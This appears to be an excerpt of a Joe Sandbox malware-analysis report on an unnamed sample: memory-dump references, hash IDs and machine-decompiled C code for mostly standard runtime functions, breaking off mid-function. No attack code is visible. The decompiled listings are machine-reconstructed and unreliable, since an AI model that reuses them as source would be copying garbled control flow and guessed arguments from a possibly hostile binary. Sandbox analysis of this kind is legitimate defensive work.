                                                                                                                            0x25bf8a7db18
                                                                                                                            0x25bf8a7db21
                                                                                                                            0x25bf8a7db22
                                                                                                                            0x25bf8a7db23
                                                                                                                            0x25bf8a7db24
                                                                                                                            0x25bf8a7db27
                                                                                                                            0x25bf8a7db2b
                                                                                                                            0x25bf8a7db2f
                                                                                                                            0x25bf8a7db3c
                                                                                                                            0x25bf8a7db40
                                                                                                                            0x25bf8a7db47
                                                                                                                            0x25bf8a7db4b
                                                                                                                            0x25bf8a7db52
                                                                                                                            0x25bf8a7db55
                                                                                                                            0x25bf8a7db58
                                                                                                                            0x25bf8a7db5b
                                                                                                                            0x25bf8a7db65
                                                                                                                            0x25bf8a7db69
                                                                                                                            0x25bf8a7db6f
                                                                                                                            0x25bf8a7db77
                                                                                                                            0x25bf8a7db81
                                                                                                                            0x25bf8a7db8e
                                                                                                                            0x25bf8a7db99
                                                                                                                            0x25bf8a7dba4
                                                                                                                            0x25bf8a7dbb7
                                                                                                                            0x25bf8a7dbb9
                                                                                                                            0x25bf8a7dbbb
                                                                                                                            0x25bf8a7dbc4
                                                                                                                            0x25bf8a7dbce
                                                                                                                            0x25bf8a7dbde
                                                                                                                            0x25bf8a7dbe8
                                                                                                                            0x25bf8a7dbf2
                                                                                                                            0x25bf8a7dbfe
                                                                                                                            0x25bf8a7dc07
                                                                                                                            0x25bf8a7dc0b
                                                                                                                            0x25bf8a7dc0f
                                                                                                                            0x25bf8a7dc14
                                                                                                                            0x25bf8a7dc21
                                                                                                                            0x25bf8a7dc26
                                                                                                                            0x25bf8a7dc2c
                                                                                                                            0x25bf8a7dc33
                                                                                                                            0x25bf8a7dc3a
                                                                                                                            0x25bf8a7dc47
                                                                                                                            0x25bf8a7dc4a
                                                                                                                            0x25bf8a7dc51
                                                                                                                            0x25bf8a7dc5b
                                                                                                                            0x25bf8a7dc64
                                                                                                                            0x25bf8a7dc6a
                                                                                                                            0x25bf8a7dc6c
                                                                                                                            0x25bf8a7dc71
                                                                                                                            0x25bf8a7dc73
                                                                                                                            0x25bf8a7dc7e
                                                                                                                            0x25bf8a7dc86
                                                                                                                            0x25bf8a7dc90
                                                                                                                            0x25bf8a7dc9a
                                                                                                                            0x25bf8a7dc9c
                                                                                                                            0x25bf8a7dca6
                                                                                                                            0x25bf8a7dcab
                                                                                                                            0x25bf8a7dcb3
                                                                                                                            0x25bf8a7dcb8
                                                                                                                            0x25bf8a7dcba
                                                                                                                            0x25bf8a7dcc2
                                                                                                                            0x25bf8a7dcc6
                                                                                                                            0x25bf8a7dcd0
                                                                                                                            0x25bf8a7dcd9
                                                                                                                            0x25bf8a7dd01

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentImageNonwritable
                                                                                                                            • String ID: $csm
                                                                                                                            • API String ID: 3104724169-717980254
                                                                                                                            • Opcode ID: 6fd12170077310210e4a067a79524cced3896a0abe59c1130f854dc253b70f79
                                                                                                                            • Instruction ID: 1b07da501940f0f588ba3c65d5c9f4c2ab3c720e18ae12b4c19b82a6028e8e86
                                                                                                                            • Opcode Fuzzy Hash: 6fd12170077310210e4a067a79524cced3896a0abe59c1130f854dc253b70f79
                                                                                                                            • Instruction Fuzzy Hash: C751AB33211A4487EF16DB25EC0876D37A5F344BEAF248621FB6547B88EB74C841D728
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8AC8BC4 Relevance: 5.4, APIs: 4, Instructions: 378COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: malloc$BoundaryDeleteDescriptor_errno_getptdfree
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1510257876-0
                                                                                                                            • Opcode ID: 02c19b759fbdd7880ccae27b06a304f9a90ecfe6e81f9b78119acf7dd140611f
                                                                                                                            • Instruction ID: 72576900ea5cd5cff0e5b0331b9961c3ce9a0f2b9b34b073dba06c389f28896f
                                                                                                                            • Opcode Fuzzy Hash: 02c19b759fbdd7880ccae27b06a304f9a90ecfe6e81f9b78119acf7dd140611f
                                                                                                                            • Instruction Fuzzy Hash: 39C18131628E048FEB6AEB289C8966573D0F756322F70416EF446C39B5DB38D8428B95
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8ACA2F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _errno_getptd_noexit_invalid_parameter_noinfo
                                                                                                                            • String ID: B
                                                                                                                            • API String ID: 1812809483-1255198513
                                                                                                                            • Opcode ID: 8ebbda852f08801afd4fd4153bde0e27189db84ee19ab4da691e454773f2f5da
                                                                                                                            • Instruction ID: 525f80c83e561234398cd250340b49c391d8d565bb3bbd9ed59feb69f390f624
                                                                                                                            • Opcode Fuzzy Hash: 8ebbda852f08801afd4fd4153bde0e27189db84ee19ab4da691e454773f2f5da
                                                                                                                            • Instruction Fuzzy Hash: 95119D31218E088FDB54EB5898897A6B3D1FB98335F2447AEB019C32A1DB74D844CB86
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8A796F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 84%
                                                                                                                            			E0000025B25BF8A796F0(long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r8, void* _a8, void* _a16, void* _a24) {
				intOrPtr _v32;
				signed long long _v40;
				intOrPtr _v48;
				signed int _v56;
				void* _t19;
				void* _t23;
				void* _t24;
				void* _t26;
				void* _t27;
				intOrPtr* _t30;
				intOrPtr* _t50;
				void* _t57;
				void* _t58;

				_t39 = __rcx;
				r8d = 0;
				goto 0xf8a79708;
				asm("int3");
				asm("int3");
				asm("int3");
				_t30 = _t50;
				 *((long long*)(_t30 + 8)) = __rbx;
				 *((long long*)(_t30 + 0x10)) = __rbp;
				 *((long long*)(_t30 + 0x18)) = __rsi;
				 *(_t30 - 0x38) =  *(_t30 - 0x38) & 0x00000000;
				_t6 = _t39 + 0x28; // 0x28
				r8d = _t6;
				E0000025B25BF8A793C0(_t24, 0, _t26, _t27, _t30 - 0x30, __rcx, __r8);
				if (__rcx != 0) goto 0xf8a79756;
				_t19 = E0000025B25BF8A7B89C(_t30);
				 *_t30 = 0x16;
				E0000025B25BF8A7BEC4(_t19);
				goto 0xf8a79782;
				_v40 = _v40 & 0x00000000;
				_v56 = _v56 & 0x00000000;
				_v48 = 0x7fffffff;
				_v32 = 0x42;
				return E0000025B25BF8A7C154(_t23, 0, _v56, __rcx,  &_v56, __rcx, __r8, __rdx, _t57, _t58);
			}
















                                                                                                                            0x25bf8a796f3
                                                                                                                            0x25bf8a796fd
                                                                                                                            0x25bf8a79700
                                                                                                                            0x25bf8a79705
                                                                                                                            0x25bf8a79706
                                                                                                                            0x25bf8a79707
                                                                                                                            0x25bf8a79708
                                                                                                                            0x25bf8a7970b
                                                                                                                            0x25bf8a7970f
                                                                                                                            0x25bf8a79713
                                                                                                                            0x25bf8a7971c
                                                                                                                            0x25bf8a7972c
                                                                                                                            0x25bf8a7972c
                                                                                                                            0x25bf8a79737
                                                                                                                            0x25bf8a7973f
                                                                                                                            0x25bf8a79741
                                                                                                                            0x25bf8a79746
                                                                                                                            0x25bf8a7974c
                                                                                                                            0x25bf8a79754
                                                                                                                            0x25bf8a79756
                                                                                                                            0x25bf8a7975c
                                                                                                                            0x25bf8a79770
                                                                                                                            0x25bf8a79778
                                                                                                                            0x25bf8a79796

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _errno_getptd_noexit_invalid_parameter_noinfo
                                                                                                                            • String ID: B
                                                                                                                            • API String ID: 1812809483-1255198513
                                                                                                                            • Opcode ID: 26844c6ebe7bd954f694562daa894dea154f98a279b34a78fd0845a724b23a57
                                                                                                                            • Instruction ID: e4e366285ba6bf5d151fe61c9e08939248f3c5f2720266939efeda1d56aa005d
                                                                                                                            • Opcode Fuzzy Hash: 26844c6ebe7bd954f694562daa894dea154f98a279b34a78fd0845a724b23a57
                                                                                                                            • Instruction Fuzzy Hash: EA1179B3620A4086EB119F12E84839DB661F798BE4F688221BB5807BD5CB3CC245DB18
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8A883ED Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 54%
                                                                                                                            			E0000025B25BF8A883ED(void* __ecx, void* __edi, void* __esp, void* __rbx, void* __rdx, void* __rsi, void* __rbp, void* __r8, void* __r12, intOrPtr _a32, char _a64, signed int _a4388, signed int _a4392, signed int _a4408, signed int _a4416) {
				signed long long _t135;
				signed long long _t137;
				signed long long _t139;
				signed long long _t141;
				void* _t184;
				signed long long _t185;

				_t184 = __rbp;
				_t183 = __rsi;
				_t145 = __rbx;
				_a4388 = _a4388 + 1;
				if (_a4388 - 3 >= 0) goto 0xf8a886b3;
				E0000025B25BF8A634DC(__rdx);
				_a4408 =  &M0000025B25BF8A967D0 + 4 + _a4388 * 0x44;
				r8d = 0;
				_a32 = E0000025B25BF8A86190( *((intOrPtr*)( &M0000025B25BF8A967D0 + _a4388 * 0x44)), __edi, __esp, _a4408, _a4408,  &_a64);
				if (_a32 == 0) goto 0xf8a8847c;
				goto 0xf8a886b5;
				E0000025B25BF8A87060(__edi, __esp,  &M0000025B25BF8A967D0 + 0x24 + _a4388 * 0x44, _t185 + 0x10f8 + _a4408 * 0,  &_a64);
				E0000025B25BF8A879D0(__edi, __esp, _t185 + 0x10f8 + ( &M0000025B25BF8A967D0 + 0x24 + _a4388 * 0x44) * 0, _t185 + _t185 + 0x10f8 + _a4408 * 0 + 0x10f8,  &_a64);
				r8d = 0x10;
				if (E0000025B25BF8A85160(0x10, _t185 + 0x10f8 +  &M0000025B25BF8A967D0 * 0,  &M0000025B25BF8A967D0 + 0x34 + _a4388 * 0x44,  &_a64) != 0) goto 0xf8a88557;
				_t135 =  &M0000025B25BF8A967D0 + 0x24 + _a4388 * 0x44;
				r8d = 0x10;
				if (E0000025B25BF8A85160(0x10, _t185 +  &M0000025B25BF8A967D0 + 0x10f8, _t135,  &_a64) == 0) goto 0xf8a88561;
				goto 0xf8a886b5;
				_a4392 = 0;
				goto 0xf8a8857e;
				_a4392 = _a4392 + 1;
				if (_a4392 - 0x10 >= 0) goto 0xf8a885a7;
				_t137 = _t185 + 0x10f8 + _t135 * 0;
				 *((char*)(_t137 + _a4392)) = 0;
				goto 0xf8a8856e;
				_a4392 = 0;
				goto 0xf8a885c4;
				_a4392 = _a4392 + 1;
				if (_a4392 - 0x3e8 >= 0) goto 0xf8a88602;
				_t139 = _t185 + 0x10f8 + _t137 * 0;
				E0000025B25BF8A87060(__edi, __esp, _t185 + 0x10f8 + _a4392 * 0, _t139,  &_a64);
				goto 0xf8a885b4;
				_a4392 = 0;
				goto 0xf8a8861f;
				_a4392 = _a4392 + 1;
				if (_a4392 - 0x3e8 >= 0) goto 0xf8a8865d;
				_t141 = _t185 + 0x10f8 + _t139 * 0;
				E0000025B25BF8A879D0(__edi, __esp, _t185 + 0x10f8 + (_t185 + 0x10f8 + _a4392 * 0) * 0, _t141,  &_a64);
				goto 0xf8a8860f;
				_a4392 = 0;
				goto 0xf8a8867a;
				_a4392 = _a4392 + 1;
				if (_a4392 - 0x10 >= 0) goto 0xf8a886ae;
				if (( *(_t185 + 0x10f8 + _t141 * 0 + _a4392) & 0x000000ff) == 0) goto 0xf8a886ac;
				goto 0xf8a886b5;
				goto 0xf8a8866a;
				goto E0000025B25BF8A883ED;
				E0000025B25BF8A88AFC(__rbx, _t185, L" Check Failure #%d - %s", __rsi);
				return E0000025B25BF8A81A50(0x10, _t145, _a4416 ^ _t185, L" Check Failure #%d - %s", _t185 + 0x10f8 + _t141 * 0, _t183, _t184, __r12);
			}









                                                                                                                            0x25bf8a883ed
                                                                                                                            0x25bf8a883ed
                                                                                                                            0x25bf8a883ed
                                                                                                                            0x25bf8a883f6
                                                                                                                            0x25bf8a88405
                                                                                                                            0x25bf8a88415
                                                                                                                            0x25bf8a88445
                                                                                                                            0x25bf8a88452
                                                                                                                            0x25bf8a88468
                                                                                                                            0x25bf8a88471
                                                                                                                            0x25bf8a88477
                                                                                                                            0x25bf8a884ad
                                                                                                                            0x25bf8a884dc
                                                                                                                            0x25bf8a8850a
                                                                                                                            0x25bf8a8851a
                                                                                                                            0x25bf8a8852f
                                                                                                                            0x25bf8a88545
                                                                                                                            0x25bf8a88555
                                                                                                                            0x25bf8a8855c
                                                                                                                            0x25bf8a88561
                                                                                                                            0x25bf8a8856c
                                                                                                                            0x25bf8a88577
                                                                                                                            0x25bf8a88586
                                                                                                                            0x25bf8a88591
                                                                                                                            0x25bf8a885a1
                                                                                                                            0x25bf8a885a5
                                                                                                                            0x25bf8a885a7
                                                                                                                            0x25bf8a885b2
                                                                                                                            0x25bf8a885bd
                                                                                                                            0x25bf8a885cf
                                                                                                                            0x25bf8a885da
                                                                                                                            0x25bf8a885fb
                                                                                                                            0x25bf8a88600
                                                                                                                            0x25bf8a88602
                                                                                                                            0x25bf8a8860d
                                                                                                                            0x25bf8a88618
                                                                                                                            0x25bf8a8862a
                                                                                                                            0x25bf8a88635
                                                                                                                            0x25bf8a88656
                                                                                                                            0x25bf8a8865b
                                                                                                                            0x25bf8a8865d
                                                                                                                            0x25bf8a88668
                                                                                                                            0x25bf8a88673
                                                                                                                            0x25bf8a88682
                                                                                                                            0x25bf8a886a3
                                                                                                                            0x25bf8a886aa
                                                                                                                            0x25bf8a886ac
                                                                                                                            0x25bf8a886ae
                                                                                                                            0x25bf8a886c2
                                                                                                                            0x25bf8a886e2

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CheckStackVars
                                                                                                                            • String ID: Check Failure #%d - %s$e quality of the resulting optimized code.
                                                                                                                            • API String ID: 3047416515-1761781716
                                                                                                                            • Opcode ID: 29c5ee883b0c0bd846ee04512c9c0c763bb5dfad89d6c9b00d7fe1077a1954b2
                                                                                                                            • Instruction ID: 20a6d8b56ae5c70b7fa70858aac3466414431cff6527048b5ecc1b971c4cbaf7
                                                                                                                            • Opcode Fuzzy Hash: 29c5ee883b0c0bd846ee04512c9c0c763bb5dfad89d6c9b00d7fe1077a1954b2
                                                                                                                            • Instruction Fuzzy Hash: C7111C73308AC086DB29DB14FD993D9B3A1F788795F911122F68947E59DB38C505CB18
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8A610C4 Relevance: 5.3, APIs: 4, Instructions: 261COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 89%
                                                                                                                            			E0000025B25BF8A610C4(void* __edx, signed long long __rbx, void* __rcx, void* __r8) {
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* __r12;
				signed long long _t51;
				long long _t53;
				long long _t66;
				long long _t71;
				void* _t82;
				void* _t84;
				signed long long _t85;
				long long _t88;
				void* _t94;
				int _t102;

				_t63 = __rbx;
				 *((long long*)(_t84 + 0x20)) = __rbx;
				_push(_t94);
				_t82 = _t84 - 0xf0;
				_t85 = _t84 - 0x270;
				_t51 =  *0xf8a9c990; // 0x18002eb3c
				 *(_t82 + 0xe0) = _t51 ^ _t85;
				_t53 = __r8 + 0x28;
				_t66 = __r8 + 0x20;
				r12d = __edx;
				_t71 = __r8 + 0x30;
				_t88 = __r8 + 0x38;
				 *((long long*)(_t82 - 0x58)) = _t66;
				 *((long long*)(_t82 - 0x60)) = _t71;
				 *((long long*)(_t82 - 0x70)) = _t88;
				 *(_t85 + 0x40) = __rbx;
				 *((long long*)(_t85 + 0x38)) = _t53;
				 *((long long*)(_t85 + 0x30)) = _t66;
				 *((long long*)(_t85 + 0x28)) = _t71;
				 *((long long*)(_t85 + 0x20)) = _t88;
				 *((long long*)(_t82 - 0x80)) = _t53;
				 *((long long*)(_t82 - 0x50)) = __r8 + 0x40;
				 *((long long*)(_t82 - 0x68)) = __r8 + 0x10;
				if (E0000025B25BF8A63CD8(__r8 + 8, __r8 + 0x10, __r8 + 0x18, __r8 + 0x40) != 0) goto 0xf8a611cc;
				_t22 = _t63 + 1; // 0x1
				calloc(_t102);
				if (_t53 != 0) goto 0xf8a611f6;
				 *(_t85 + 0x40) =  *(_t85 + 0x40) & 0x00000000;
				 *((long long*)(_t85 + 0x38)) =  *((intOrPtr*)( *((intOrPtr*)(_t82 - 0x80))));
				 *((long long*)(_t85 + 0x30)) =  *((intOrPtr*)( *((intOrPtr*)(_t82 - 0x58))));
				 *((long long*)(_t85 + 0x28)) =  *((intOrPtr*)( *((intOrPtr*)(_t82 - 0x60))));
				 *((long long*)(_t85 + 0x20)) =  *((intOrPtr*)( *((intOrPtr*)(_t82 - 0x70))));
				E0000025B25BF8A63D50( *((intOrPtr*)( *((intOrPtr*)(_t82 - 0x68)))),  *((intOrPtr*)(__r8 + 8)),  *((intOrPtr*)(__r8 + 0x18)),  *((intOrPtr*)( *((intOrPtr*)(_t82 - 0x50)))));
				return E0000025B25BF8A81A50(_t22, __rbx,  *(_t82 + 0xe0) ^ _t85,  *((intOrPtr*)(__r8 + 8)), __r8,  *((intOrPtr*)(_t82 - 0x80)), _t82, _t94);
			}

















                                                                                                                            0x25bf8a610c4
                                                                                                                            0x25bf8a610c4
                                                                                                                            0x25bf8a610cc
                                                                                                                            0x25bf8a610d4
                                                                                                                            0x25bf8a610dc
                                                                                                                            0x25bf8a610e3
                                                                                                                            0x25bf8a610ed
                                                                                                                            0x25bf8a610f7
                                                                                                                            0x25bf8a610fe
                                                                                                                            0x25bf8a61102
                                                                                                                            0x25bf8a61105
                                                                                                                            0x25bf8a61109
                                                                                                                            0x25bf8a61115
                                                                                                                            0x25bf8a61119
                                                                                                                            0x25bf8a6111d
                                                                                                                            0x25bf8a6112b
                                                                                                                            0x25bf8a61130
                                                                                                                            0x25bf8a61135
                                                                                                                            0x25bf8a6113a
                                                                                                                            0x25bf8a6113f
                                                                                                                            0x25bf8a6114d
                                                                                                                            0x25bf8a61151
                                                                                                                            0x25bf8a61155
                                                                                                                            0x25bf8a61160
                                                                                                                            0x25bf8a61162
                                                                                                                            0x25bf8a6116a
                                                                                                                            0x25bf8a61175
                                                                                                                            0x25bf8a6117e
                                                                                                                            0x25bf8a6118e
                                                                                                                            0x25bf8a6119a
                                                                                                                            0x25bf8a611a6
                                                                                                                            0x25bf8a611b2
                                                                                                                            0x25bf8a611c5
                                                                                                                            0x25bf8a611f5

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: free$_errno$_calloc_implcalloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4000150058-0
                                                                                                                            • Opcode ID: 3ab89f050e60a3aaf2f7de364a4cc34658e2925fb796430c95c3304d995e1cbf
                                                                                                                            • Instruction ID: 14a50245a42b53eb1bd9c57ed0988ace5e1c673c074a7bf00b454c253dd6191e
                                                                                                                            • Opcode Fuzzy Hash: 3ab89f050e60a3aaf2f7de364a4cc34658e2925fb796430c95c3304d995e1cbf
                                                                                                                            • Instruction Fuzzy Hash: 06C1E933604F858AEB61CF65E88439E7BA4F388B95F205129FA8D43F58DB38C455CB14
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 01306040 Relevance: 5.3, Strings: 4, Instructions: 256COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 87%
                                                                                                                            			E01306040(long long __rax, long long __rbp, void* __r14, long long _a8) {
				char _v8;
				long long _v16;
				long long _v24;
				void* _t209;
				void* _t213;
				void* _t214;
				void* _t215;
				void* _t216;
				void* _t279;
				long long _t295;
				void* _t296;
				void* _t300;

				L0:
				while(1) {
					L0:
					_t303 = __r14;
					if(_t300 >  *((intOrPtr*)(__r14 + 0x10))) {
						break;
					}
					L2:
					_a8 = __rax;
					E01356200(_t296, __rbp);
				}
				L1:
				_v8 = __rbp;
				_t298 =  &_v8;
				_a8 = __rax;
				_t280 =  *((intOrPtr*)(__rax + 0x78));
				_v16 =  *((intOrPtr*)(__rax + 0x78));
				E01332340(_t296,  &_v8, __r14);
				E01332C40(_t209, _t214, _t215, _t216, 0x1387115, _t279,  &_v8, __r14);
				L01332AA0(_t213, _t214, _t216, _v16, _t280,  &_v8, __r14);
				E013325A0(_t209, _t213, _t214, _t215, _t216,  &_v8, __r14);
				L013323C0(_t296,  &_v8, __r14);
				_v16 =  *((intOrPtr*)(_a8 + 0x90));
				E01332340(_t296, _t298, _t303);
				E01332C40(_t209, _t214, _t215, _t216, 0x1387125, _t279, _t298, _t303);
				L01332AA0(_t213, _t214, _t216, _v16,  *((intOrPtr*)(_a8 + 0x90)), _t298, _t303);
				E013325A0(_t209, _t213, _t214, _t215, _t216, _t298, _t303);
				L013323C0(_t296, _t298, _t303);
				_v16 =  *((intOrPtr*)(_a8 + 0x80));
				E01332340(_t296, _t298, _t303);
				E01332C40(_t209, _t214, _t215, _t216, 0x138712d, _t279, _t298, _t303);
				L01332AA0(_t213, _t214, _t216, _v16,  *((intOrPtr*)(_a8 + 0x80)), _t298, _t303);
				E013325A0(_t209, _t213, _t214, _t215, _t216, _t298, _t303);
				L013323C0(_t296, _t298, _t303);
				_v16 =  *((intOrPtr*)(_a8 + 0xb0));
				E01332340(_t296, _t298, _t303);
				E01332C40(_t209, _t214, _t215, _t216, 0x1387135, _t279, _t298, _t303);
				L01332AA0(_t213, _t214, _t216, _v16,  *((intOrPtr*)(_a8 + 0xb0)), _t298, _t303);
				E013325A0(_t209, _t213, _t214, _t215, _t216, _t298, _t303);
				L013323C0(_t296, _t298, _t303);
				_v16 =  *((intOrPtr*)(_a8 + 0xa8));
				E01332340(_t296, _t298, _t303);
				E01332C40(_t209, _t214, _t215, _t216, 0x138714d, _t279, _t298, _t303);
				L01332AA0(_t213, _t214, _t216, _v16,  *((intOrPtr*)(_a8 + 0xa8)), _t298, _t303);
				E013325A0(_t209, _t213, _t214, _t215, _t216, _t298, _t303);
				L013323C0(_t296, _t298, _t303);
				_v16 =  *((intOrPtr*)(_a8 + 0xa0));
				E01332340(_t296, _t298, _t303);
				E01332C40(_t209, _t214, _t215, _t216, 0x138711d, _t279, _t298, _t303);
				L01332AA0(_t213, _t214, _t216, _v16,  *((intOrPtr*)(_a8 + 0xa0)), _t298, _t303);
				E013325A0(_t209, _t213, _t214, _t215, _t216, _t298, _t303);
				L013323C0(_t296, _t298, _t303);
				_v16 =  *((intOrPtr*)(_a8 + 0x98));
				E01332340(_t296, _t298, _t303);
				E01332C40(_t209, _t214, _t215, _t216, 0x1387155, _t279, _t298, _t303);
				L01332AA0(_t213, _t214, _t216, _v16,  *((intOrPtr*)(_a8 + 0x98)), _t298, _t303);
				E013325A0(_t209, _t213, _t214, _t215, _t216, _t298, _t303);
				L013323C0(_t296, _t298, _t303);
				_v16 =  *((intOrPtr*)(_a8 + 0xb8));
				E01332340(_t296, _t298, _t303);
				E01332C40(_t209, _t214, _t215, _t216, 0x1387105, _t279, _t298, _t303);
				L01332AA0(_t213, _t214, _t216, _v16,  *((intOrPtr*)(_a8 + 0xb8)), _t298, _t303);
				E013325A0(_t209, _t213, _t214, _t215, _t216, _t298, _t303);
				L013323C0(_t296, _t298, _t303);
				_v16 =  *((intOrPtr*)(_a8 + 0xc0));
				E01332340(_t296, _t298, _t303);
				E01332C40(_t209, _t214, _t215, _t216, 0x138710d, _t279, _t298, _t303);
				L01332AA0(_t213, _t214, _t216, _v16,  *((intOrPtr*)(_a8 + 0xc0)), _t298, _t303);
				E013325A0(_t209, _t213, _t214, _t215, _t216, _t298, _t303);
				L013323C0(_t296, _t298, _t303);
				_v16 =  *((intOrPtr*)(_a8 + 0xc8));
				E01332340(_t296, _t298, _t303);
				E01332C40(_t209, _t214, _t215, _t216, 0x13870d5, _t279, _t298, _t303);
				L01332AA0(_t213, _t214, _t216, _v16,  *((intOrPtr*)(_a8 + 0xc8)), _t298, _t303);
				E013325A0(_t209, _t213, _t214, _t215, _t216, _t298, _t303);
				L013323C0(_t296, _t298, _t303);
				_v16 =  *((intOrPtr*)(_a8 + 0xd0));
				E01332340(_t296, _t298, _t303);
				E01332C40(_t209, _t214, _t215, _t216, 0x13870dd, _t279, _t298, _t303);
				L01332AA0(_t213, _t214, _t216, _v16,  *((intOrPtr*)(_a8 + 0xd0)), _t298, _t303);
				E013325A0(_t209, _t213, _t214, _t215, _t216, _t298, _t303);
				L013323C0(_t296, _t298, _t303);
				_v16 =  *((intOrPtr*)(_a8 + 0xd8));
				E01332340(_t296, _t298, _t303);
				E01332C40(_t209, _t214, _t215, _t216, 0x13870e5, _t279, _t298, _t303);
				L01332AA0(_t213, _t214, _t216, _v16,  *((intOrPtr*)(_a8 + 0xd8)), _t298, _t303);
				E013325A0(_t209, _t213, _t214, _t215, _t216, _t298, _t303);
				L013323C0(_t296, _t298, _t303);
				_v16 =  *((intOrPtr*)(_a8 + 0xe0));
				E01332340(_t296, _t298, _t303);
				E01332C40(_t209, _t214, _t215, _t216, 0x13870ed, _t279, _t298, _t303);
				L01332AA0(_t213, _t214, _t216, _v16,  *((intOrPtr*)(_a8 + 0xe0)), _t298, _t303);
				E013325A0(_t209, _t213, _t214, _t215, _t216, _t298, _t303);
				L013323C0(_t296, _t298, _t303);
				_v16 =  *((intOrPtr*)(_a8 + 0xe8));
				E01332340(_t296, _t298, _t303);
				E01332C40(_t209, _t214, _t215, _t216, 0x13870f5, _t279, _t298, _t303);
				L01332AA0(_t213, _t214, _t216, _v16,  *((intOrPtr*)(_a8 + 0xe8)), _t298, _t303);
				E013325A0(_t209, _t213, _t214, _t215, _t216, _t298, _t303);
				L013323C0(_t296, _t298, _t303);
				_v16 =  *((intOrPtr*)(_a8 + 0xf0));
				E01332340(_t296, _t298, _t303);
				E01332C40(_t209, _t214, _t215, _t216, 0x13870fd, _t279, _t298, _t303);
				L01332AA0(_t213, _t214, _t216, _v16,  *((intOrPtr*)(_a8 + 0xf0)), _t298, _t303);
				E013325A0(_t209, _t213, _t214, _t215, _t216, _t298, _t303);
				L013323C0(_t296, _t298, _t303);
				_t295 =  *((intOrPtr*)(_a8 + 0xf8));
				_v16 = _t295;
				E01332340(_t296, _t298, _t303);
				E01332C40(_t209, _t214, _t215, _t216, 0x1387145, _t279, _t298, _t303);
				L01332AA0(_t213, _t214, _t216, _v16, _t295, _t298, _t303);
				E013325A0(_t209, _t213, _t214, _t215, _t216, _t298, _t303);
				L013323C0(_t296, _t298, _t303);
				_v24 = _t295;
				E01332340(_t296, _t298, _t303);
				E01332C40( *((intOrPtr*)(_a8 + 0x44)), _t214, _t215, _t216, 0x138713d, _t279, _t298, _t303);
				L01332AA0(_t213, _t214, _t216, _v24, _t295, _t298, _t303);
				E013325A0( *((intOrPtr*)(_a8 + 0x44)), _t213, _t214, _t215, _t216, _t298, _t303);
				L013323C0(_t296, _t298, _t303);
				_v24 = _t295;
				E01332340(_t296, _t298, _t303);
				E01332C40( *(_a8 + 0x38) & 0x0000ffff, _t214, _t215, _t216, 0x13870a5, _t279, _t298, _t303);
				L01332AA0(_t213, _t214, _t216, _v24, _t295, _t298, _t303);
